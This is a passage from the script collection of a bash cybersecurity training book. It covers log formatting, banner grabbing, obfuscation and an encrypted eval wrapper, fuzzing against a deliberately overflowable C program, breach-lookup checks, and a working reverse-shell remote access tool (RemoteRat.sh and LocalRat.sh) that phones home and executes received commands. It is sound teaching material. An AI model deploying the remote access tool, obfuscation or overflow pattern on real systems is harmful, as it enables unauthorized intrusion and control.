header tags echo "" # <1> echo "" echo "

$1

" #title echo "" #table with border echo "" #new table row echo "" #column header echo "" echo "" echo "" echo "" echo "" echo "" echo "" while read f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12plus # <2> do echo "" tagit "td" "${f1}" tagit "td" "${f4} ${f5}" # <3> tagit "td" "${f6} ${f7}" tagit "td" "${f9}" tagit "td" "${f10}" tagit "td" "${f11}" tagit "td" "${f12plus}" echo "" done < $1 #close tags echo "

IP Address	Date	URL Requested	Status Code	Size	Referrer	User Agent

" echo "" echo "" ================================================ FILE: ch13/bannergrabber.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # bannergrabber.sh # # Description: # Automatically pull the banners from HTTP, SMTP, # and FTP servers # # Usage: ./bannergrabber.sh hostname [scratchfile] # scratchfile is used during processing but removed; # default is: "scratch.file" or tempfile-generated name # # function isportopen () { (( $# < 2 )) && return 1 # <1> local host port host=$1 port=$2 echo >/dev/null 2>&1 < /dev/tcp/${host}/${port} # <2> return $? } function cleanup () { rm -f "$SCRATCH" } ATHOST="$1" SCRATCH="$2" if [[ -z $2 ]] then if [[ -n $(type -p tempfile) ]] then SCRATCH=$(tempfile) else SCRATCH='scratch.file' fi fi trap cleanup EXIT # <3> touch "$SCRATCH" # <4> if isportopen $ATHOST 21 # FTP <5> then # i.e., ftp -n $ATHOST exec 3<>/dev/tcp/${ATHOST}/21 # <6> echo -e 'quit\r\n' >&3 # <7> cat <&3 >> "$SCRATCH" # <8> fi if isportopen $ATHOST 25 # SMTP then # i.e., telnet $ATHOST 25 exec 3<>/dev/tcp/${ATHOST}/25 echo -e 'quit\r\n' >&3 cat <&3 >> "$SCRATCH" fi if isportopen $ATHOST 80 # HTTP then curl -LIs "https://${ATHOST}" >> "$SCRATCH" # <9> fi cat "$SCRATCH" # <10> ================================================ FILE: ch13/smtpconnect.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # smtpconnect.sh # # Description: # Connect to a SMTP server and print welcome banner # # Usage: # smtpconnect.sh # SMTP server to connect to # exec 3<>/dev/tcp/"$1"/25 echo -e 'quit\r\n' >&3 cat <&3 ================================================ FILE: ch14/askey.sh ================================================ # functions to convert decimal to ascii and vice-versa # aschar - print the ascii character representation # of the number passed in as an argument # example: aschar 65 ==> A # function aschar () { local ashex # <1> printf -v ashex '\\x%02x' $1 # <2> printf '%b' $ashex # <3> } # asnum - print the ascii (decimal) number # of the character passed in as $1 # example: asnum A ==> 65 # function asnum () { printf '%d' "\"$1" # <4> } ================================================ FILE: ch14/innerscript.sh ================================================ echo "This is an encrypted script" echo "running uname -a" uname -a ================================================ FILE: ch14/logfuscate.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # logfuscate.sh # # Description: # Demonstration of logic obfuscation # f="$1" #<1> a() ( b() { f="$(($f+5))" #<5> g="$(($f+7))" #<6> c #<7> } b #<4> ) c() ( d() { g="$(($g-$f))" #<10> f="$(($f-2))" #<11> echo "$f" #<12> } f="$(($f-3))" #<8> d #<9> ) f="$(($f+$2))" #<2> a #<3> ================================================ FILE: ch14/oneline.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # oneline.sh # # Description: # Demonstration of one-line script obfuscation # if [[ $1 == "test" ]]; then echo "testing"; else echo "not testing"; fi; echo "some command"; echo "another command" ================================================ FILE: ch14/readable.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # readable.sh # # Description: # Simple script to be obfuscated # if [[ $1 == "test" ]] then echo "testing" else echo "not testing" fi echo "some command" echo "another command" ================================================ FILE: ch14/streamcipher.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # streamcipher.sh # # Description: # A lightweight implementation of a stream cipher # Pedagogical - not recommended for serious use # # Usage: # streamcipher.sh [-d] < inputfile # -d Decrypt mode # Numeric key # # source ./askey.sh # <1> # # Ncrypt - Encrypt - reads in characters # outputs 2digit hex #s # function Ncrypt () # <2> { TXT="$1" for((i=0; i< ${#TXT}; i++)) # <3> do CHAR="${TXT:i:1}" # <4> RAW=$(asnum "$CHAR") # " " needed for space (32) # <5> NUM=${RANDOM} COD=$(( RAW ^ ( NUM & 0x7F ))) # <6> printf "%02X" "$COD" # <7> done echo # <8> } # # Dcrypt - DECRYPT - reads in a 2digit hex #s # outputs characters # function Dcrypt () # <9> { TXT="$1" for((i=0; i< ${#TXT}; i=i+2)) # <10> do CHAR="0x${TXT:i:2}" # <11> RAW=$(( $CHAR )) # <12> NUM=${RANDOM} COD=$(( RAW ^ ( NUM & 0x7F ))) # <13> aschar "$COD" # <14> done echo } if [[ -n $1 && $1 == "-d" ]] # <15> then DECRYPT="YES" shift # <16> fi KEY=${1:-1776} # <17> RANDOM="${KEY}" # <18> while read -r # <19> do if [[ -z $DECRYPT ]] # <20> then Ncrypt "$REPLY" else Dcrypt "$REPLY" fi done ================================================ FILE: ch14/synfuscate.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # synfuscate.sh # # Description: # Demonstration of syntax script obfuscation # a () #<1> { local a="Local Variable a" #<2> echo "$a" } a="Global Variable a" #<3> echo "$a" a ================================================ FILE: ch14/wrapper.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # wrapper.sh # # Description: # Example of executing an encrypted "wrapped" script # # Usage: # wrapper.sh # Enter the password when prompted # encrypted='U2FsdGVkX18WvDOyPFcvyvAozJHS3tjrZIPlZM9xRhz0tuwzDrKhKBBuugLxzp7T MoJoqx02tX7KLhATS0Vqgze1C+kzFxtKyDAh9Nm2N0HXfSNuo9YfYD+15DoXEGPd' #<1> read -s word #<2> innerScript=$(echo "$encrypted" | openssl aes-256-cbc -base64 -d -pass pass:"$word") #<3> eval "$innerScript" #<4> ================================================ FILE: ch15/fuzzer.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # fuzzer.sh # # Description: # Fuzz a specified argument of a program # # Usage: # bash fuzzer.sh [?] ... # The target executable program/script # The static arguments for the executable # '?' The argument to be fuzzed # example: fuzzer.sh ./myprog -t '?' fn1 fn2 # # function usagexit () # <1> { echo "usage: $0 executable args" echo "example: $0 myapp -lpt arg \?" exit 1 } >&2 # <2> if (($# < 2)) # <3> then usagexit fi # the app we will fuzz is the first arg THEAPP="$1" shift # <4> # is it really there? type -t "$THEAPP" >/dev/null || usagexit # <5> # which arg to vary? # find the ? and note its position declare -i i for ((i=0; $# ; i++)) # <6> do ALIST+=( "$1" ) # <7> if [[ $1 == '?' ]] then NDX=$i # <8> fi shift done # printf "Executable: %s Arg: %d %s\n" "$THEAPP" $NDX "${ALIST[$NDX]}" # now fuzz away: MAX=10000 FUZONE="a" FUZARG="" for ((i=1; i <= MAX; i++)) # <9> do FUZARG="${FUZARG}${FUZONE}" # aka += ALIST[$NDX]="$FUZARG" # order of >s is important $THEAPP "${ALIST[@]}" 2>&1 >/dev/null # <10> if (( $? )) ; then echo "Caused by: $FUZARG" >&2 ; fi # <11> done ================================================ FILE: ch15/fuzzme.c ================================================ #include #include //Cybersecurity Ops with bash //Warning - This is an insecure program and is for demonstration //purposes only int main(int argc, char *argv[]) { char combined[50] = ""; strcat(combined, argv[1]); strcat(combined, " "); strcat(combined, argv[2]); printf("The two arguments combined is: %s\n", combined); return(0); } ================================================ FILE: ch16/LocalRat.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # LocalRat.sh # # Description: # Remote access tool to be on a local system, # it listens for a connection from the remote system # and helps with any file transfer requested # # Usage: LocalRat.sh port1 [port2 [port3]] # # # define our background file transfer daemon function bgfilexfer () { while true do FN=$(nc -nlvvp $HOMEPORT2 2>>/tmp/x2.err) # <3> if [[ $FN == 'exit' ]] ; then exit ; fi nc -nlp $HOMEPORT3 < $FN # <4> done } # -------------------- main --------------------- HOMEPORT=$1 HOMEPORT2=${2:-$((HOMEPORT+1))} HOMEPORT3=${3:-$((HOMEPORT2+1))} # initiate the background file transfer daemon bgfilexfer & # <1> # listen for an incoming connection nc -nlvp $HOMEPORT # <2> ================================================ FILE: ch16/RemoteRat.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # RemoteRat.sh # # Description: # Remote access tool to be run on the remote system; # mostly hands any input to the shell # but if indicated (with a !) fetch and run a script # # Usage: RemoteRat.sh hostname port1 [port2 [port3]] # function cleanup () { rm -f $TMPFL } function runScript () { # tell 'em what script we want echo "$1" > /dev/tcp/${HOMEHOST}/${HOMEPORT2} # <7> # stall sleep 1 # <8> if [[ $1 == 'exit' ]] ; then exit ; fi cat > $TMPFL bash $TMPFL # <10> } # ------------------- MAIN ------------------- # could do some error checking here HOMEHOST=$1 HOMEPORT=$2 HOMEPORT2=${3:-$((HOMEPORT+1))} HOMEPORT3=${4:-$((HOMEPORT2+1))} TMPFL="/tmp/$$.sh" trap cleanup EXIT # phone home: exec &0 2>&0 # <1> while true do echo -n '$ ' # <2> read -r # <3> if [[ ${REPLY:0:1} == '!' ]] # <4> then # it's a script FN=${REPLY:1} # <5> runScript $FN else # normal case - run the cmd eval "$REPLY" # <6> fi done ================================================ FILE: ch19/pingmonitor.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # pingmonitor.sh # # Description: # Use ping to monitor host availability # # Usage: # pingmonitor.sh # File containing a list of hosts # Number of seconds between pings # while true do clear echo 'Cybersecurity Ops System Monitor' echo 'Status: Scanning ...' echo '-----------------------------------------' while read -r ipadd do ipadd=$(echo "$ipadd" | sed 's/\r//') #<1> ping -n 1 "$ipadd" | egrep '(Destination host unreachable|100%)' &> /dev/null #<2> if (( "$?" == 0 )) #<3> then tput setaf 1 #<4> echo "Host $ipadd not found - $(date)" | tee -a monitorlog.txt #<5> tput setaf 7 fi done < "$1" echo "" echo "Done." for ((i="$2"; i > 0; i--)) #<6> do tput cup 1 0 #<7> echo "Status: Next scan in $i seconds" sleep 1 done done ================================================ FILE: ch20/softinv.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # softinv.sh # # Description: # list the software installed on a system # for later aggregation and analysis; # # Usage: ./softinv.sh [filename] # output is written to $1 or _softinv.txt # # set the output filename OUTFN="${1:-${HOSTNAME}_softinv.txt}" # <1> # which command to run depends on the OS and what's there OSbase=win type -t rpm &> /dev/null # <2> (( $? == 0 )) && OSbase=rpm # <3> type -t dpkg &> /dev/null (( $? == 0 )) && OSbase=deb type -t apt &> /dev/null (( $? == 0 )) && OSbase=apt case ${OSbase} in # <4> win) INVCMD="wmic product get name,version //format:csv" ;; rpm) INVCMD="rpm -qa" ;; deb) INVCMD="dpkg -l" ;; apt) INVCMD="apt list --installed" ;; *) echo "error: OSbase=${OSbase}" exit -1 ;; esac # # run the inventory # $INVCMD 2>/dev/null > $OUTFN # <5> ================================================ FILE: ch21/test.input ================================================ file ./TODO.txt !file ./validate.sh !file nogo.sh user albing !user bob group mysql !group skip hash a7f36f4519661cf2aaaf0ebf057f768fc35dafe8 validate.sh hash b79f70b18538de0199e6829e06b547e079df8842 /bin/ls ================================================ FILE: ch21/validateconfig.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # validateconfig.sh # # Description: # Validate a specified configuration exists # # Usage: # validateconfig.sh < configfile # # configuration specification looks like: # [[!]file|hash|reg|[!]user|[!]group] [args] # examples: # file /usr/local/bin/sfx - file exists # hash 12384970347 /usr/local/bin/sfx - file has this hash # !user bono - no user "bono" allowed # group students - must have a students group # # errexit - show correct usage and exit function errexit () { echo "invalid syntax at line $ln" echo "usage: [!]file|hash|reg|[!]user|[!]group [args]" # <1> exit 2 } # errexit # vfile - vaildate the [non]existance of filename # args: 1: the "not" flag - value:1/0 # 2: filename # function vfile () { local isThere=0 [[ -e $2 ]] && isThere=1 # <2> (( $1 )) && let isThere=1-$isThere # <3> return $isThere } # vfile # verify the user id function vuser () { local isUser $UCMD $2 &>/dev/null isUser=$? if (( $1 )) # <4> then let isUser=1-$isUser fi return $isUser } # vuser # verify the group id function vgroup () { local isGroup id $2 &>/dev/null isGroup=$? if (( $1 )) then let isGroup=1-$isGroup fi return $isGroup } # vgroup # verify the hash on the file function vhash () { local res=0 local X=$(sha1sum $2) # <5> if [[ ${X%% *} == $1 ]] # <6> then res=1 fi return $res } # vhash # a windows system registry check function vreg () { local res=0 local keypath=$1 local value=$2 local expected=$3 local REGVAL=$(query $keypath //v $value) if [[ $REGVAL == $expected ]] then res=1 fi return $res } # vreg # # main # # do this once, for use in verifying user ids UCMD="net user" type -t net &>/dev/null || UCMD="id" # <7> ln=0 while read cmd args do let ln++ donot=0 if [[ ${cmd:0:1} == '!' ]] # <8> then donot=1 basecmd=${cmd#\!} # <9> fi case "$basecmd" in file) OK=1 vfile $donot "$args" res=$? ;; hash) OK=1 # split args into 1st word , remainder vhash "${args%% *}" "${args#* }" # <10> res=$? ;; reg) # Windows Only! OK=1 vreg $args res=$? ;; user) OK=0 vuser $args res=$? ;; group) OK=0 vgroup $args res=$? ;; *) errexit # <11> ;; esac if (( res != OK )) then echo "FAIL: [$ln] $cmd $args" fi done ================================================ FILE: ch22/checkemail.1liner ================================================ #!/bin/bash # # checkemail.sh - check an email address against # the Have I Been Pwned? database # in 1 line EMAILIN="$1" if (( "$#" == 0 )) #<1> then printf 'Enter email address: ' read EMAILIN fi EMAILIN="https://haveibeenpwned.com/api/v2/breachedaccount/$EMAILIN" echo 'Account pwned in the following breaches:' curl -s "$EMAILIN" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"' #<2> ================================================ FILE: ch22/checkemail.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # checkemail.sh # # Description: # check an email address against the # Have I Been Pwned? database # # Usage: ./checkemail.sh [] # Email address to check; default: reads from stdin # if (( "$#" == 0 )) #<1> then printf 'Enter email address: ' read emailin else emailin="$1" fi pwned=$(curl -s "https://haveibeenpwned.com/api/v2/breachedaccount/$emailin") #<2> if [ "$pwned" == "" ] then exit 1 else echo 'Account pwned in the following breaches:' echo "$pwned" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"' #<3> exit 0 fi ================================================ FILE: ch22/checkemailAlt.sh ================================================ #!/bin/bash # # checkemail.sh - check an email address against # the Have I Been Pwned? database # if (( "$#" == 0 )) #<1> then printf 'Enter email address: ' read emailin else emailin="$1" fi URL="https://haveibeenpwned.com/api/v2/breachedaccount/$emailin" pwned=$(curl -s "$URL" | grep -Po '"Name":".*?"' ) #<2> if [ "$pwned" == "" ] then exit 1 else echo 'Account pwned in the following breaches:' # <3> pwned="${pwned//\"/}" # remove all quotes pwned="${pwned//Name:/}" # remove all 'Name:' echo "${pwned}" exit 0 fi ================================================ FILE: ch22/checkpass.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # checkpass.sh # # Description: # Check a password against the # Have I Been Pwned? database # # Usage: ./checkpass.sh [] # Password to check # default: read from stdin # if (( "$#" == 0 )) #<1> then printf 'Enter your password: ' read -s passin #<2> echo else passin="$1" fi passin=$(echo -n "$passin" | sha1sum) #<3> passin=${passin:0:40} firstFive=${passin:0:5} #<4> ending=${passin:5} pwned=$(curl -s "https://api.pwnedpasswords.com/range/$firstFive" | \ tr -d '\r' | grep -i "$ending" ) #<5> passwordFound=${pwned##*:} #<6> if [ "$passwordFound" == "" ] then exit 1 else printf 'Password is Pwned %d Times!\n' "$passwordFound" exit 0 fi ================================================ FILE: ch22/emailbatch.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # emailbatch.sh # # Description: # Read in a file of email addresses and run them # against Have I Been Pwned # # Usage: ./emailbatch.sh [] # File with one email address on each line # default: reads from stdin # cat "$1" | tr -d '\r' | while read fileLine #<1> do ./checkemail.sh "$fileLine" > /dev/null #<2> if (( "$?" == 0 )) #<3> then echo "$fileLine is Pwned!" fi sleep 0.25 #<4> done ================================================ FILE: readme.txt ================================================ Cybersecurity Ops with bash Attack, Defend, and Analyze from the Command Line ---------------------------------------------------------------------------------------- Scripts Version 1.0 ---------------------------------------------------------------------------------------- About ---------------------------------------------------------------------------------------- All of the scripts and data referenced in the book are included with this file. The number tags (i.e. <1>, <2>, <3>) contained in each script file corresponds to the numbered callout explanations from within the book. Script Robustness ---------------------------------------------------------------------------------------- The included scripts are written to illustrate and teach concepts. The scripts are not designed to be efficient or robust enough for enterprise deployment. Use caution if you choose to use the scripts in a live environment. Be sure to follow programming best practices and test your scripts before deployment. Disclaimer ---------------------------------------------------------------------------------------- The included scripts are provided "as is" and without any warranties or guarantees. ---------------------------------------------------------------------------------------- https://www.rapidcyberops.com ----------------------------------------------------------------------------------------